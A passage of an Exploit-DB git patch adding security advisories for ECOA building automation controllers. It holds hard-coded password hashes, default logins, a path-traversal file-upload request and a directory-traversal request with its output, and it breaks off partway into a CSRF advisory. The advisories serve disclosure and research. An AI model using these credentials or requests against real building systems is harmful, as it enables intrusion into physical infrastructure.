From 629e35077483549945dee8dd7d6b14ce11045337 Mon Sep 17 00:00:00 2001 
From: Offensive Security
Date: Tue, 14 Sep 2021 05:02:12 +0000
Subject: [PATCH] DB: 2021-09-14

18 changes to exploits/shellcodes

Active WebCam 11.5 - Unquoted Service Path
ECOA Building Automation System - Missing Encryption Of Sensitive Information
Facebook ParlAI 1.0.0 - Deserialization of Untrusted Data in parlai
ECOA Building Automation System - Hard-coded Credentials SSH Access
Men Salon Management System 1.0 - Multiple Vulnerabilities
ECOA Building Automation System - Weak Default Credentials
ECOA Building Automation System - Path Traversal Arbitrary File Upload
ECOA Building Automation System - Directory Traversal Content Disclosure
ECOA Building Automation System - 'multiple' Cross-Site Request Forgery (CSRF)
ECOA Building Automation System - Cookie Poisoning Authentication Bypass
ECOA Building Automation System - Configuration Download Information Disclosure
ECOA Building Automation System - Hidden Backdoor Accounts and backdoor() Function
ECOA Building Automation System - Remote Privilege Escalation
ECOA Building Automation System - Local File Disclosure
ECOA Building Automation System - Arbitrary File Deletion
Wordpress Plugin Download From Files 1.48 - Arbitrary File Upload
Apartment Visitor Management System (AVMS) 1.0 - SQLi to RCE
Windows/x64 - Reverse TCP (192.168.201.11:4444) Shellcode (330 Bytes)
---
 exploits/hardware/local/50283.txt | 109 +++++++++++
 exploits/hardware/remote/50282.txt | 114 +++++++++++
 exploits/hardware/webapps/50275.txt | 117 +++++++++++
 exploits/hardware/webapps/50276.txt | 123 ++++++++++++
 exploits/hardware/webapps/50277.txt | 144 ++++++++++++++
 exploits/hardware/webapps/50278.txt | 122 ++++++++++++
 exploits/hardware/webapps/50279.txt | 121 ++++++++++++
 exploits/hardware/webapps/50280.txt | 131 +++++++++++++
 exploits/hardware/webapps/50281.txt | 114 +++++++++++
 exploits/hardware/webapps/50284.txt | 110 +++++++++++
 exploits/hardware/webapps/50285.txt | 133 +++++++++++++
 exploits/hardware/webapps/50286.txt | 110 +++++++++++
exploits/php/webapps/50274.txt | 30 +++ exploits/php/webapps/50287.py | 75 +++++++ exploits/php/webapps/50288.py | 77 ++++++++ exploits/python/local/50289.py | 49 +++++ exploits/windows/local/50273.txt | 28 +++ files_exploits.csv | 17 ++ files_shellcodes.csv | 1 + shellcodes/windows_x86-64/50291.c | 290 ++++++++++++++++++++++++++++ 20 files changed, 2015 insertions(+) create mode 100644 exploits/hardware/local/50283.txt create mode 100644 exploits/hardware/remote/50282.txt create mode 100644 exploits/hardware/webapps/50275.txt create mode 100644 exploits/hardware/webapps/50276.txt create mode 100644 exploits/hardware/webapps/50277.txt create mode 100644 exploits/hardware/webapps/50278.txt create mode 100644 exploits/hardware/webapps/50279.txt create mode 100644 exploits/hardware/webapps/50280.txt create mode 100644 exploits/hardware/webapps/50281.txt create mode 100644 exploits/hardware/webapps/50284.txt create mode 100644 exploits/hardware/webapps/50285.txt create mode 100644 exploits/hardware/webapps/50286.txt create mode 100644 exploits/php/webapps/50274.txt create mode 100755 exploits/php/webapps/50287.py create mode 100755 exploits/php/webapps/50288.py create mode 100755 exploits/python/local/50289.py create mode 100644 exploits/windows/local/50273.txt create mode 100644 shellcodes/windows_x86-64/50291.c diff --git a/exploits/hardware/local/50283.txt b/exploits/hardware/local/50283.txt new file mode 100644 index 000000000..c95e19b73 --- /dev/null +++ b/exploits/hardware/local/50283.txt 
@@ -0,0 +1,109 @@ +# Exploit Title: ECOA Building Automation System - Missing Encryption Of Sensitive Information +# Date: 25.06.2021 +# Exploit Author: Neurogenesia +# Vendor Homepage: http://www.ecoa.com.tw + +ECOA Building Automation System Missing Encryption Of Sensitive Information + + +Vendor: ECOA Technologies Corp. +Product web page: http://www.ecoa.com.tw +Affected version: ECOA ECS Router Controller - ECS (FLASH) + ECOA RiskBuster Terminator - E6L45 + ECOA RiskBuster System - RB 3.0.0 + ECOA RiskBuster System - TRANE 1.0 + ECOA Graphic Control Software + ECOA SmartHome II - E9246 + ECOA RiskTerminator + +Summary: +#1 The Risk-Terminator Web Graphic control BEMS (Building Energy Management System) are +designed to provide you with the latest in the Human Machine Interface (HMI) technology, +for completely monitoring and controlling management. It may be used singly for small and +medium sized facilities, could be linked together via the high-speed Ethernet to other +servers that suit to World Wide Web (WWW) or Local Area Network (LAN) for large and more +sophisticated applications. The Risk-Terminator practice Web basic conception that with +operation simply and conveniently, totally share risk and make sure of security. Even +remote sites may be controlled and monitored through Ethernet port, which base on standard +transferring protocol like XML, Modbus TCP/IP or BACnet or URL. + +#2 The RiskBuster is a Web enabled network Router Server that uses Ethernet and TCP/IP +networking technologies. It incorporates an embedded web server that can deliver user-specific +web pages to any PC or mobile terminal running internet browser software. A user with an +appropriate security codes can made adjustment or monitor the network control unit form +any internet access point in the world. 
It also provides network management, integration +and process control functions for any existing or new building controllers and microprocessor +based equipments or system in buildings. The management function provided by the RiskBuster +such as trend log and alarm generation improves building controllers and microprocessor +based equipments or system management and audit trail capabilities. The integration function +provided by the RiskBuster allows seamless integration such as information sharing (read/write) +between building controllers and microprocessor based equipments or system without any need +of major upgrade or equipments replacement and allow cost saving. The process control functions +provided by the RiskBuster allow global control action to be implemented across any building +controllers and microprocessor based equipments or system to allow full building control. The +RiskBuster provide a truly cost effective solution for any building automation or high level +integration application. A truly Ethernet network compliant feature allows the RiskBuster to +be install anywhere in the building. + +#3 ECM0000160 Digital Logic Controller (DLC) are Pre-programmed controller it intended for +Building Automate System; Environment control system; HVAC control system and other types of +equipment. Being fully programmable it ensures complete application versatility, allowing +specific products to be created according to customer requests. This controller is a configurable +unitary controller based on the 32bit series microcomputer, with an on-board clock, have two +RS-485 local bus. + +#4 The ECS0000160 is a Router Controller for building and industry products based on various +microprocessors. It not only accessing information but also monitoring and controlling across +Internet directly. The ECS0000160 can totally replace and improve a typical system that always +has tedious panel and complex working process. 
An obviously benefit to our customers is that +ECS0000160 enabling them to interact with their systems anytime, anywhere, not only just allowed +to connect with singular specific operating system. It's like a whole package, which provides +browsers an easy platform to monitor and control the doors, alarms, devices, etc. that all +through web-pages operating, which works base on standard transmission Internet protocol. The +ECS0000160 provides a low industry cost. A truly friendly network interface which is simple +and easy to apply on factory floors. It supports from serial ports with options of RS485. + +#5 HOME SERVER-EHC9246150 - This web basic home-server is with the specifications of hidden +installation, 32bits microcomputer and I/O Peripheral expansion circuit, which include: D/A +conversion circuit, A/D conversion circuit and optical isolation circuit, using default proportional, +integral and differential (P+I+D) and dead-zone control to control accurately. The controller +features contains the sensing system, proportional control systems, computing modules, control +modules, alarm detection system, and so on. It mainly used in building control, plant monitoring, +air monitoring, lighting and power control, the use of premises for buildings, factories, offices, +conference rooms, restaurants, hotels, etc. + +Desc: +The BAS controller stores sensitive data (backup exports) in clear-text. + +Tested on: EMBED/1.0 + Apache Tomcat/6.0.44 + Apache Tomcat/6.0.18 + Windows Server + MySQL Version 5.1.60 + MySQL Version 4.0.16 + Version 2.0.1.28 20180628 + + +Vulnerability discovered by Neurogenesia + @zeroscience + + +Advisory ID: ZSL-2021-5676 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5676.php + + +25.06.2021 + +-- + + +Missing Encryption of Sensitive Information +------------------------------------------- + +- Data stored on the system is not protected/encrypted. + +sql_[DATE]linux.dat reveals clear-text password from backup. 
+ +Excerpt from DB: + +Insert into userlist (userid,userpwd,userClass,userfrm,duetime,modidate,userMenu,usertel,usermobil,usermail,gpname,userCname,usergrp) values (?,?,?,?,?,?,?,?,?,?,?,?,?)%%2%%1user%%3user%%312%%3%%30%%320100630133229%%3null%%3%%3%%3%%3%%3%%3%%3%%1guest%%3guest%%31%%3%%30%%320100630133229%%3null%%3%%3%%3%%3%%3%%3%%3%%1humex%%3humex4377 \ No newline at end of file diff --git a/exploits/hardware/remote/50282.txt b/exploits/hardware/remote/50282.txt new file mode 100644 index 000000000..05569b7d2 --- /dev/null +++ b/exploits/hardware/remote/50282.txt 
@@ -0,0 +1,114 @@ +# Exploit Title: ECOA Building Automation System - Hard-coded Credentials SSH Access +# Date: 25.06.2021 +# Exploit Author: Neurogenesia +# Vendor Homepage: http://www.ecoa.com.tw + +ECOA Building Automation System Hard-coded Credentials SSH Access + + +Vendor: ECOA Technologies Corp. +Product web page: http://www.ecoa.com.tw +Affected version: ECOA ECS Router Controller - ECS (FLASH) + ECOA RiskBuster Terminator - E6L45 + ECOA RiskBuster System - RB 3.0.0 + ECOA RiskBuster System - TRANE 1.0 + ECOA Graphic Control Software + ECOA SmartHome II - E9246 + ECOA RiskTerminator + +Summary: +#1 The Risk-Terminator Web Graphic control BEMS (Building Energy Management System) are +designed to provide you with the latest in the Human Machine Interface (HMI) technology, +for completely monitoring and controlling management. It may be used singly for small and +medium sized facilities, could be linked together via the high-speed Ethernet to other +servers that suit to World Wide Web (WWW) or Local Area Network (LAN) for large and more +sophisticated applications. The Risk-Terminator practice Web basic conception that with +operation simply and conveniently, totally share risk and make sure of security. Even +remote sites may be controlled and monitored through Ethernet port, which base on standard +transferring protocol like XML, Modbus TCP/IP or BACnet or URL. + +#2 The RiskBuster is a Web enabled network Router Server that uses Ethernet and TCP/IP +networking technologies. It incorporates an embedded web server that can deliver user-specific +web pages to any PC or mobile terminal running internet browser software. A user with an +appropriate security codes can made adjustment or monitor the network control unit form +any internet access point in the world. It also provides network management, integration +and process control functions for any existing or new building controllers and microprocessor +based equipments or system in buildings. 
The management function provided by the RiskBuster +such as trend log and alarm generation improves building controllers and microprocessor +based equipments or system management and audit trail capabilities. The integration function +provided by the RiskBuster allows seamless integration such as information sharing (read/write) +between building controllers and microprocessor based equipments or system without any need +of major upgrade or equipments replacement and allow cost saving. The process control functions +provided by the RiskBuster allow global control action to be implemented across any building +controllers and microprocessor based equipments or system to allow full building control. The +RiskBuster provide a truly cost effective solution for any building automation or high level +integration application. A truly Ethernet network compliant feature allows the RiskBuster to +be install anywhere in the building. + +#3 ECM0000160 Digital Logic Controller (DLC) are Pre-programmed controller it intended for +Building Automate System; Environment control system; HVAC control system and other types of +equipment. Being fully programmable it ensures complete application versatility, allowing +specific products to be created according to customer requests. This controller is a configurable +unitary controller based on the 32bit series microcomputer, with an on-board clock, have two +RS-485 local bus. + +#4 The ECS0000160 is a Router Controller for building and industry products based on various +microprocessors. It not only accessing information but also monitoring and controlling across +Internet directly. The ECS0000160 can totally replace and improve a typical system that always +has tedious panel and complex working process. An obviously benefit to our customers is that +ECS0000160 enabling them to interact with their systems anytime, anywhere, not only just allowed +to connect with singular specific operating system. 
It's like a whole package, which provides +browsers an easy platform to monitor and control the doors, alarms, devices, etc. that all +through web-pages operating, which works base on standard transmission Internet protocol. The +ECS0000160 provides a low industry cost. A truly friendly network interface which is simple +and easy to apply on factory floors. It supports from serial ports with options of RS485. + +#5 HOME SERVER-EHC9246150 - This web basic home-server is with the specifications of hidden +installation, 32bits microcomputer and I/O Peripheral expansion circuit, which include: D/A +conversion circuit, A/D conversion circuit and optical isolation circuit, using default proportional, +integral and differential (P+I+D) and dead-zone control to control accurately. The controller +features contains the sensing system, proportional control systems, computing modules, control +modules, alarm detection system, and so on. It mainly used in building control, plant monitoring, +air monitoring, lighting and power control, the use of premises for buildings, factories, offices, +conference rooms, restaurants, hotels, etc. + +Desc: +The BAS controller is vulnerable to hard-coded credentials within its Linux distribution image. +These sets of credentials are never exposed to the end-user and cannot be changed through any +normal operation of the device. + +Tested on: EMBED/1.0 + Apache Tomcat/6.0.44 + Apache Tomcat/6.0.18 + Windows Server + MySQL Version 5.1.60 + MySQL Version 4.0.16 + Version 2.0.1.28 20180628 + + +Vulnerability discovered by Neurogenesia + @zeroscience + + +Advisory ID: ZSL-2021-5675 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5675.php + + +25.06.2021 + +-- + + +Hard-coded Credentials / Remote SSH Access +------------------------------------------ + +- Exercise for the nation-state actors and actresses. 
+ + +root:$1$ILT0V4Sf$AR4nYzAFri3Cqi2BwFD/h.:16183:0:99999:7::: +user:$1$pJefShJL$CoX8T20vn1g.ug0jZIczM.:11851:0:99999:7::: +webs:$1$ZP8rifJj$8Nq6pvZfZleSOM1NxQAck0::::::: +admin:$1$7BGOwUYp$dgzOcdE9eXPmxZ0PomIOR0::::::: +ecoa:$1$Ux/uar1o$RlMzoY0I7KEMkmNzDqzFz1:-5835:0:99999:7::: +humex:$1$1v5rveDi$bXRhL1q20wpYM5vo3aZ050:-5877:0:99999:7::: +guest:$1$Zb9DELKT$IK8/EnLI8o0G36kjjBjWj1:6845:0:99999:7::: \ No newline at end of file diff --git a/exploits/hardware/webapps/50275.txt b/exploits/hardware/webapps/50275.txt new file mode 100644 index 000000000..97979a7d3 --- /dev/null +++ b/exploits/hardware/webapps/50275.txt 
@@ -0,0 +1,117 @@ +# Exploit Title: ECOA Building Automation System - Weak Default Credentials +# Date: 25.06.2021 +# Exploit Author: Neurogenesia +# Vendor Homepage: http://www.ecoa.com.tw + + +ECOA Building Automation System Weak Default Credentials + + +Vendor: ECOA Technologies Corp. +Product web page: http://www.ecoa.com.tw +Affected version: ECOA ECS Router Controller - ECS (FLASH) + ECOA RiskBuster Terminator - E6L45 + ECOA RiskBuster System - RB 3.0.0 + ECOA RiskBuster System - TRANE 1.0 + ECOA Graphic Control Software + ECOA SmartHome II - E9246 + ECOA RiskTerminator + +Summary: +#1 The Risk-Terminator Web Graphic control BEMS (Building Energy Management System) are +designed to provide you with the latest in the Human Machine Interface (HMI) technology, +for completely monitoring and controlling management. It may be used singly for small and +medium sized facilities, could be linked together via the high-speed Ethernet to other +servers that suit to World Wide Web (WWW) or Local Area Network (LAN) for large and more +sophisticated applications. The Risk-Terminator practice Web basic conception that with +operation simply and conveniently, totally share risk and make sure of security. Even +remote sites may be controlled and monitored through Ethernet port, which base on standard +transferring protocol like XML, Modbus TCP/IP or BACnet or URL. + +#2 The RiskBuster is a Web enabled network Router Server that uses Ethernet and TCP/IP +networking technologies. It incorporates an embedded web server that can deliver user-specific +web pages to any PC or mobile terminal running internet browser software. A user with an +appropriate security codes can made adjustment or monitor the network control unit form +any internet access point in the world. It also provides network management, integration +and process control functions for any existing or new building controllers and microprocessor +based equipments or system in buildings. 
The management function provided by the RiskBuster +such as trend log and alarm generation improves building controllers and microprocessor +based equipments or system management and audit trail capabilities. The integration function +provided by the RiskBuster allows seamless integration such as information sharing (read/write) +between building controllers and microprocessor based equipments or system without any need +of major upgrade or equipments replacement and allow cost saving. The process control functions +provided by the RiskBuster allow global control action to be implemented across any building +controllers and microprocessor based equipments or system to allow full building control. The +RiskBuster provide a truly cost effective solution for any building automation or high level +integration application. A truly Ethernet network compliant feature allows the RiskBuster to +be install anywhere in the building. + +#3 ECM0000160 Digital Logic Controller (DLC) are Pre-programmed controller it intended for +Building Automate System; Environment control system; HVAC control system and other types of +equipment. Being fully programmable it ensures complete application versatility, allowing +specific products to be created according to customer requests. This controller is a configurable +unitary controller based on the 32bit series microcomputer, with an on-board clock, have two +RS-485 local bus. + +#4 The ECS0000160 is a Router Controller for building and industry products based on various +microprocessors. It not only accessing information but also monitoring and controlling across +Internet directly. The ECS0000160 can totally replace and improve a typical system that always +has tedious panel and complex working process. An obviously benefit to our customers is that +ECS0000160 enabling them to interact with their systems anytime, anywhere, not only just allowed +to connect with singular specific operating system. 
It's like a whole package, which provides +browsers an easy platform to monitor and control the doors, alarms, devices, etc. that all +through web-pages operating, which works base on standard transmission Internet protocol. The +ECS0000160 provides a low industry cost. A truly friendly network interface which is simple +and easy to apply on factory floors. It supports from serial ports with options of RS485. + +#5 HOME SERVER-EHC9246150 - This web basic home-server is with the specifications of hidden +installation, 32bits microcomputer and I/O Peripheral expansion circuit, which include: D/A +conversion circuit, A/D conversion circuit and optical isolation circuit, using default proportional, +integral and differential (P+I+D) and dead-zone control to control accurately. The controller +features contains the sensing system, proportional control systems, computing modules, control +modules, alarm detection system, and so on. It mainly used in building control, plant monitoring, +air monitoring, lighting and power control, the use of premises for buildings, factories, offices, +conference rooms, restaurants, hotels, etc. + +Desc: +The BAS controller uses weak set of default administrative credentials that can be easily guessed +in remote password attacks and gain full control of the system. + +Tested on: EMBED/1.0 + Apache Tomcat/6.0.44 + Apache Tomcat/6.0.18 + Windows Server + MySQL Version 5.1.60 + MySQL Version 4.0.16 + Version 2.0.1.28 20180628 + + +Vulnerability discovered by Neurogenesia + @zeroscience + + +Advisory ID: ZSL-2021-5668 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5668.php + + +25.06.2021 + +-- + + +Default / Weak Credentials +-------------------------- + +- Attacker can use default credentials and authenticate to the SmartHome, Building Automation and Access Control System. 
+ + +Credentials: + +guest:guest +user:user +admin:admin +root:embed +embed:power +administrator:empty +humex:humex4377 +ecoa:ecoa4377 \ No newline at end of file diff --git a/exploits/hardware/webapps/50276.txt b/exploits/hardware/webapps/50276.txt new file mode 100644 index 000000000..5eee09785 --- /dev/null +++ b/exploits/hardware/webapps/50276.txt 
@@ -0,0 +1,123 @@ +# Exploit Title: ECOA Building Automation System - Path Traversal Arbitrary File Upload +# Date: 25.06.2021 +# Exploit Author: Neurogenesia +# Vendor Homepage: http://www.ecoa.com.tw + +ECOA Building Automation System Path Traversal Arbitrary File Upload + + +Vendor: ECOA Technologies Corp. +Product web page: http://www.ecoa.com.tw +Affected version: ECOA ECS Router Controller - ECS (FLASH) + ECOA RiskBuster Terminator - E6L45 + ECOA RiskBuster System - RB 3.0.0 + ECOA RiskBuster System - TRANE 1.0 + ECOA Graphic Control Software + ECOA SmartHome II - E9246 + ECOA RiskTerminator + +Summary: +#1 The Risk-Terminator Web Graphic control BEMS (Building Energy Management System) are +designed to provide you with the latest in the Human Machine Interface (HMI) technology, +for completely monitoring and controlling management. It may be used singly for small and +medium sized facilities, could be linked together via the high-speed Ethernet to other +servers that suit to World Wide Web (WWW) or Local Area Network (LAN) for large and more +sophisticated applications. The Risk-Terminator practice Web basic conception that with +operation simply and conveniently, totally share risk and make sure of security. Even +remote sites may be controlled and monitored through Ethernet port, which base on standard +transferring protocol like XML, Modbus TCP/IP or BACnet or URL. + +#2 The RiskBuster is a Web enabled network Router Server that uses Ethernet and TCP/IP +networking technologies. It incorporates an embedded web server that can deliver user-specific +web pages to any PC or mobile terminal running internet browser software. A user with an +appropriate security codes can made adjustment or monitor the network control unit form +any internet access point in the world. It also provides network management, integration +and process control functions for any existing or new building controllers and microprocessor +based equipments or system in buildings. 
The management function provided by the RiskBuster +such as trend log and alarm generation improves building controllers and microprocessor +based equipments or system management and audit trail capabilities. The integration function +provided by the RiskBuster allows seamless integration such as information sharing (read/write) +between building controllers and microprocessor based equipments or system without any need +of major upgrade or equipments replacement and allow cost saving. The process control functions +provided by the RiskBuster allow global control action to be implemented across any building +controllers and microprocessor based equipments or system to allow full building control. The +RiskBuster provide a truly cost effective solution for any building automation or high level +integration application. A truly Ethernet network compliant feature allows the RiskBuster to +be install anywhere in the building. + +#3 ECM0000160 Digital Logic Controller (DLC) are Pre-programmed controller it intended for +Building Automate System; Environment control system; HVAC control system and other types of +equipment. Being fully programmable it ensures complete application versatility, allowing +specific products to be created according to customer requests. This controller is a configurable +unitary controller based on the 32bit series microcomputer, with an on-board clock, have two +RS-485 local bus. + +#4 The ECS0000160 is a Router Controller for building and industry products based on various +microprocessors. It not only accessing information but also monitoring and controlling across +Internet directly. The ECS0000160 can totally replace and improve a typical system that always +has tedious panel and complex working process. An obviously benefit to our customers is that +ECS0000160 enabling them to interact with their systems anytime, anywhere, not only just allowed +to connect with singular specific operating system. 
It's like a whole package, which provides +browsers an easy platform to monitor and control the doors, alarms, devices, etc. that all +through web-pages operating, which works base on standard transmission Internet protocol. The +ECS0000160 provides a low industry cost. A truly friendly network interface which is simple +and easy to apply on factory floors. It supports from serial ports with options of RS485. + +#5 HOME SERVER-EHC9246150 - This web basic home-server is with the specifications of hidden +installation, 32bits microcomputer and I/O Peripheral expansion circuit, which include: D/A +conversion circuit, A/D conversion circuit and optical isolation circuit, using default proportional, +integral and differential (P+I+D) and dead-zone control to control accurately. The controller +features contains the sensing system, proportional control systems, computing modules, control +modules, alarm detection system, and so on. It mainly used in building control, plant monitoring, +air monitoring, lighting and power control, the use of premises for buildings, factories, offices, +conference rooms, restaurants, hotels, etc. + +Desc: +The BAS controller suffers from an arbitrary file write and directory traversal vulnerability. +Using the POST parameters 'rbt' and 'filename', attackers can set arbitrary values for location +and content type and gain the possibility to execute arbitrary code on the affected device. 
+ +Tested on: EMBED/1.0 + Apache Tomcat/6.0.44 + Apache Tomcat/6.0.18 + Windows Server + MySQL Version 5.1.60 + MySQL Version 4.0.16 + Version 2.0.1.28 20180628 + + +Vulnerability discovered by Neurogenesia + @zeroscience + + +Advisory ID: ZSL-2021-5669 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5669.php + + +25.06.2021 + +-- + + +Directory Traversal / File Path Traversal / Unrestricted File Upload +-------------------------------------------------------------------- + +- Abusing the 'filename' and 'rbt' POST parameter, attacker can navigate outside current directory and write files in arbitrary location. +- There is no validation on file content, file extension and file location. + + +Request: + +POST /ebd-bin/upload HTTP/1.1 +Host: 192.168.1.3:8080 + +------WebKitFormBoundaryvxy2zFDs1Z69pfRB +Content-Disposition: form-data; name="rbt" + +ecsfile +------WebKitFormBoundaryvxy2zFDs1Z69pfRB +Content-Disposition: form-data; name="filename"; filename="../../../anyfile.ext" +Content-Type: application/octet-stream + +ANY_CONTENT_HERE +------WebKitFormBoundaryvxy2zFDs1Z69pfRB-- \ No newline at end of file diff --git a/exploits/hardware/webapps/50277.txt b/exploits/hardware/webapps/50277.txt new file mode 100644 index 000000000..6f96b975c --- /dev/null +++ b/exploits/hardware/webapps/50277.txt 
@@ -0,0 +1,144 @@ +# Exploit Title: ECOA Building Automation System - Directory Traversal Content Disclosure +# Date: 25.06.2021 +# Exploit Author: Neurogenesia +# Vendor Homepage: http://www.ecoa.com.tw + +ECOA Building Automation System Directory Traversal Content Disclosure + + +Vendor: ECOA Technologies Corp. +Product web page: http://www.ecoa.com.tw +Affected version: ECOA ECS Router Controller - ECS (FLASH) + ECOA RiskBuster Terminator - E6L45 + ECOA RiskBuster System - RB 3.0.0 + ECOA RiskBuster System - TRANE 1.0 + ECOA Graphic Control Software + ECOA SmartHome II - E9246 + ECOA RiskTerminator + +Summary: +#1 The Risk-Terminator Web Graphic control BEMS (Building Energy Management System) are +designed to provide you with the latest in the Human Machine Interface (HMI) technology, +for completely monitoring and controlling management. It may be used singly for small and +medium sized facilities, could be linked together via the high-speed Ethernet to other +servers that suit to World Wide Web (WWW) or Local Area Network (LAN) for large and more +sophisticated applications. The Risk-Terminator practice Web basic conception that with +operation simply and conveniently, totally share risk and make sure of security. Even +remote sites may be controlled and monitored through Ethernet port, which base on standard +transferring protocol like XML, Modbus TCP/IP or BACnet or URL. + +#2 The RiskBuster is a Web enabled network Router Server that uses Ethernet and TCP/IP +networking technologies. It incorporates an embedded web server that can deliver user-specific +web pages to any PC or mobile terminal running internet browser software. A user with an +appropriate security codes can made adjustment or monitor the network control unit form +any internet access point in the world. It also provides network management, integration +and process control functions for any existing or new building controllers and microprocessor +based equipments or system in buildings. 
The management function provided by the RiskBuster +such as trend log and alarm generation improves building controllers and microprocessor +based equipments or system management and audit trail capabilities. The integration function +provided by the RiskBuster allows seamless integration such as information sharing (read/write) +between building controllers and microprocessor based equipments or system without any need +of major upgrade or equipments replacement and allow cost saving. The process control functions +provided by the RiskBuster allow global control action to be implemented across any building +controllers and microprocessor based equipments or system to allow full building control. The +RiskBuster provide a truly cost effective solution for any building automation or high level +integration application. A truly Ethernet network compliant feature allows the RiskBuster to +be install anywhere in the building. + +#3 ECM0000160 Digital Logic Controller (DLC) are Pre-programmed controller it intended for +Building Automate System; Environment control system; HVAC control system and other types of +equipment. Being fully programmable it ensures complete application versatility, allowing +specific products to be created according to customer requests. This controller is a configurable +unitary controller based on the 32bit series microcomputer, with an on-board clock, have two +RS-485 local bus. + +#4 The ECS0000160 is a Router Controller for building and industry products based on various +microprocessors. It not only accessing information but also monitoring and controlling across +Internet directly. The ECS0000160 can totally replace and improve a typical system that always +has tedious panel and complex working process. An obviously benefit to our customers is that +ECS0000160 enabling them to interact with their systems anytime, anywhere, not only just allowed +to connect with singular specific operating system. 
It's like a whole package, which provides +browsers an easy platform to monitor and control the doors, alarms, devices, etc. that all +through web-pages operating, which works base on standard transmission Internet protocol. The +ECS0000160 provides a low industry cost. A truly friendly network interface which is simple +and easy to apply on factory floors. It supports from serial ports with options of RS485. + +#5 HOME SERVER-EHC9246150 - This web basic home-server is with the specifications of hidden +installation, 32bits microcomputer and I/O Peripheral expansion circuit, which include: D/A +conversion circuit, A/D conversion circuit and optical isolation circuit, using default proportional, +integral and differential (P+I+D) and dead-zone control to control accurately. The controller +features contains the sensing system, proportional control systems, computing modules, control +modules, alarm detection system, and so on. It mainly used in building control, plant monitoring, +air monitoring, lighting and power control, the use of premises for buildings, factories, offices, +conference rooms, restaurants, hotels, etc. + +Desc: +The BAS controller suffers from a directory traversal content disclosure vulnerability. Using the +GET parameter 'cpath' in File Manager (fmangersub), attackers can disclose directory content on the +affected device. + +Tested on: EMBED/1.0 + Apache Tomcat/6.0.44 + Apache Tomcat/6.0.18 + Windows Server + MySQL Version 5.1.60 + MySQL Version 4.0.16 + Version 2.0.1.28 20180628 + + +Vulnerability discovered by Neurogenesia + @zeroscience + + +Advisory ID: ZSL-2021-5670 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5670.php + + +25.06.2021 + +-- + + +Directory Traversal Content Disclosure +-------------------------------------- + +- Abysing the 'cpath' GET parameter, attackers can disclose directory contents by directory traversal attacks. +- cpath=. 
+- cpath=../../../../../../../etc + + +Request: + +GET /fmangersub?cpath=/ HTTP/1.1 +Host: 192.168.1.3:8080 + +bacevent.elf +redown.elf +system.bin +webnewc.elf +err.txt +hole.elf +modbustcp.elf +ianplc.bin +hitachi.el +bacser.elf +root.pem +pwsd.bin +server.lst +symtbl.tbl +client.pem +gb-unicode.bin +httpser.elf +namelst.bin +AI.tbl +BI.tbl +AV.tbl +BV.tbl +mstplalf +rthost.elf +big5-unicode.bin +version.bin +modbus.elf +rbdev.bin +rbdlc.elf +powercrd.elf \ No newline at end of file diff --git a/exploits/hardware/webapps/50278.txt b/exploits/hardware/webapps/50278.txt new file mode 100644 index 000000000..89d4eec1e --- /dev/null +++ b/exploits/hardware/webapps/50278.txt 
@@ -0,0 +1,122 @@ +# Exploit Title: ECOA Building Automation System - 'multiple' Cross-Site Request Forgery (CSRF) +# Date: 25.06.2021 +# Exploit Author: Neurogenesia +# Vendor Homepage: http://www.ecoa.com.tw + +ECOA Building Automation System Cross-Site Request Forgery + + +Vendor: ECOA Technologies Corp. +Product web page: http://www.ecoa.com.tw +Affected version: ECOA ECS Router Controller - ECS (FLASH) + ECOA RiskBuster Terminator - E6L45 + ECOA RiskBuster System - RB 3.0.0 + ECOA RiskBuster System - TRANE 1.0 + ECOA Graphic Control Software + ECOA SmartHome II - E9246 + ECOA RiskTerminator + +Summary: +#1 The Risk-Terminator Web Graphic control BEMS (Building Energy Management System) are +designed to provide you with the latest in the Human Machine Interface (HMI) technology, +for completely monitoring and controlling management. It may be used singly for small and +medium sized facilities, could be linked together via the high-speed Ethernet to other +servers that suit to World Wide Web (WWW) or Local Area Network (LAN) for large and more +sophisticated applications. The Risk-Terminator practice Web basic conception that with +operation simply and conveniently, totally share risk and make sure of security. Even +remote sites may be controlled and monitored through Ethernet port, which base on standard +transferring protocol like XML, Modbus TCP/IP or BACnet or URL. + +#2 The RiskBuster is a Web enabled network Router Server that uses Ethernet and TCP/IP +networking technologies. It incorporates an embedded web server that can deliver user-specific +web pages to any PC or mobile terminal running internet browser software. A user with an +appropriate security codes can made adjustment or monitor the network control unit form +any internet access point in the world. It also provides network management, integration +and process control functions for any existing or new building controllers and microprocessor +based equipments or system in buildings. 
The management function provided by the RiskBuster +such as trend log and alarm generation improves building controllers and microprocessor +based equipments or system management and audit trail capabilities. The integration function +provided by the RiskBuster allows seamless integration such as information sharing (read/write) +between building controllers and microprocessor based equipments or system without any need +of major upgrade or equipments replacement and allow cost saving. The process control functions +provided by the RiskBuster allow global control action to be implemented across any building +controllers and microprocessor based equipments or system to allow full building control. The +RiskBuster provide a truly cost effective solution for any building automation or high level +integration application. A truly Ethernet network compliant feature allows the RiskBuster to +be install anywhere in the building. + +#3 ECM0000160 Digital Logic Controller (DLC) are Pre-programmed controller it intended for +Building Automate System; Environment control system; HVAC control system and other types of +equipment. Being fully programmable it ensures complete application versatility, allowing +specific products to be created according to customer requests. This controller is a configurable +unitary controller based on the 32bit series microcomputer, with an on-board clock, have two +RS-485 local bus. + +#4 The ECS0000160 is a Router Controller for building and industry products based on various +microprocessors. It not only accessing information but also monitoring and controlling across +Internet directly. The ECS0000160 can totally replace and improve a typical system that always +has tedious panel and complex working process. An obviously benefit to our customers is that +ECS0000160 enabling them to interact with their systems anytime, anywhere, not only just allowed +to connect with singular specific operating system. 
